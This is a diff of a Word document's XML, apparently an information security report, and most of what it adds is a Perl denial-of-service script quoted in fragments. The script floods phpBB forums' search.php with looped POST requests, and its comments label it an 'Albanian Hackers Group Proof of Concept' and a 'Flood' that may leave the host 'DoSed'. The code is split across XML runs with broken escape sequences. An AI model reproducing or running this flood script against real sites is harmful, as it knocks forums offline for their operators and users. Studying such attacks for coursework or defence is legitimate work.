+        <w:t xml:space="preserve"> $sock "Content-Length: $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lrgnn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>postitn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>close(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>$sock);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Print a "+" for every loop </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>syswrite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> STDOUT, "+";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">$x++; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Tipi 2-sh </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Krkim</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">Flood) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">} </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>elsif</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ($type == 2){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>while(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">$x != 9999) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">{ </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Final Search String to Send </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>postit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&amp;search_term</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>s=any&amp;search_author=&amp;search_forum=-1&amp;search_time=0&amp;search_fields=msgonly</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>&amp;search_cat=-1&amp;sort_by=0&amp;sort_dir=ASC&amp;show_results=posts&amp;return_chars=20</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>0";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Posit Length </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lrg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = length $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>postit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Connect Socket with Variables Provided By User </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>my</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock = new IO::Socket::INET ( </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">                                 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PeerAddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> =&gt; "$host", </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">                                 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PeerPort</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> =&gt; "80", </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">                                 Proto =&gt; "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">", </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">                                ); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>die</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nThe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Socket Can't Connect To The Desired Host or the Host is </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>MayBe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DoSed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>: $</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>!n</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>" unless $sock;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Sending Truth Socket </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP Commands For Send A BD Search Into </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Forums </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "POST $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pth</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"."</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>search.php</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>?mode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">=results HTTP/1.1n"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Host: $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hostn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Accept: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>n;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>q</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=0.8,image/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>png</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">,*/*;q=0.5n"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Referer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>: $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hostn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Accept-Language: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>en-usn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urlencodedn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Accept-Encoding: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gzip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>deflaten</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>en</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-US; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>rv</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>:1.7.8</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) Gecko/20050511 Firefox/1.0.4n"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Connection: Keep-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Aliven</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Cache-Control: no-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cachen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Content-Length: $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lrgnn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>postitn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>close(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>$sock);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Print a "+" for every loop </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>syswrite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> STDOUT, "+";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Increment X in One for every Loop </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">$x++; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">} </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>}else</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">{ </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## STF??? </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Qfar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>keni</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Shtypur</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>die</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Mundsia</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nuk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Lejohet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> +_-???</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>n</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId15"/>
-      <w:footerReference w:type="default" r:id="rId16"/>
+      <w:headerReference w:type="default" r:id="rId31"/>
+      <w:footerReference w:type="default" r:id="rId32"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
@@ -3071,7 +8891,6 @@
       <w:p>
         <w:pPr>
           <w:pStyle w:val="Footer"/>
-          <w:jc w:val="center"/>
         </w:pPr>
       </w:p>
       <w:p>
@@ -3092,7 +8911,7 @@
           <w:rPr>
             <w:noProof/>
           </w:rPr>
-          <w:t>4</w:t>
+          <w:t>12</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -3158,7 +8977,7 @@
       <w:pStyle w:val="Header"/>
     </w:pPr>
     <w:r>
-      <w:t>University of Reading</w:t>
+      <w:t>Information Security</w:t>
     </w:r>
     <w:r>
       <w:tab/>
@@ -3176,7 +8995,7 @@
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="00433A75"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="7B9EE03E"/>
+    <w:tmpl w:val="8812A098"/>
     <w:lvl w:ilvl="0" w:tplc="08090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -4163,7 +9982,7 @@
   <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="65261DA9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="9F040CBE"/>
+    <w:tmpl w:val="45B215DA"/>
     <w:lvl w:ilvl="0" w:tplc="08090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -4908,7 +10727,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -5160,6 +10978,37 @@
       <w:spacing w:after="100"/>
       <w:ind w:left="440"/>
     </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Subtitle">
+    <w:name w:val="Subtitle"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="SubtitleChar"/>
+    <w:uiPriority w:val="11"/>
+    <w:qFormat/>
+    <w:rsid w:val="00114D5A"/>
+    <w:pPr>
+      <w:numPr>
+        <w:ilvl w:val="1"/>
+      </w:numPr>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
+      <w:spacing w:val="15"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
+    <w:name w:val="Subtitle Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Subtitle"/>
+    <w:uiPriority w:val="11"/>
+    <w:rsid w:val="00114D5A"/>
+    <w:rPr>
+      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
+      <w:spacing w:val="15"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
@@ -5449,7 +11298,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BF030E76-6FC1-4155-841C-CF9C613C65B9}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A0C0A9D7-8A73-4D75-AA59-9DB38D746126}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
